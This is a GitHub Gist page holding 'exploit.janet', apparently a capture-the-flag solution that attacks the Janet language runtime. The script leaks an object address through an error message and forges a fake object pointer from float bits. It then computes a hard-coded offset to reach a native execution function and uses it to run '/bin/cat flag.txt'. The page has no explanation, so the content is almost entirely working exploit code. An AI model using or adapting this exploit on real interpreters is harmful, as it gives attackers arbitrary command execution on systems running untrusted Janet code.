Skip to content

Instantly share code, notes, and snippets.

@YiChenChai

YiChenChai/exploit.janet

Created March 30, 2021 08:37
Show Gist options
  • Save YiChenChai/17f3441ba158a6c5c5b34ad2b2a0e01d to your computer and use it in GitHub Desktop.
Save YiChenChai/17f3441ba158a6c5c5b34ad2b2a0e01d to your computer and use it in GitHub Desktop.
Download ZIP
Raw
exploit.janet
(defn fakeobj [a b]
(def buffer (tarray/buffer 8))
(def buffer-float64-view (tarray/new :float64 1 1 0 buffer))
(def buffer-uint32-view (tarray/new :uint32 2 1 0 buffer))
(set (buffer-uint32-view 1) a)
(set (buffer-uint32-view 0) b)
(buffer-float64-view 0)
)
(defn funcarg [a] (a))
(var myarr (array/new 8))
(for i 0 8 (put myarr i 0))
(put myarr 0 peg/compile)
(var myarr_addr 0)
(try
(do
(funcarg myarr))
([err] (set myarr_addr (string/trim (get (string/split " " err) 1) ">")))
)
(print myarr_addr)
(var topaddr (scan-number (string/slice myarr_addr 0 6)))
(var lowaddr (scan-number (string/join @("0x" (string/slice myarr_addr 6 14)))))
(+= topaddr 0xfffd8000)
(print topaddr)
(var cfunc_loc_raw (fakeobj topaddr lowaddr))
(var conv (tarray/buffer 8))
(def conv_u8 (tarray/new :uint8 8 1 0 conv))
(def conv_u32 (tarray/new :uint32 2 1 0 conv))
(for i 0 8 (set (conv_u8 i) (get cfunc_loc_raw i)))
(var osexec (fakeobj (conv_u32 1) (+ 0x1f2a0 (- (conv_u32 0) 0x24900))))
(osexec @("/bin/cat" "flag.txt"))
Sign up for free to join this conversation on GitHub. Already have an account? Sign in to comment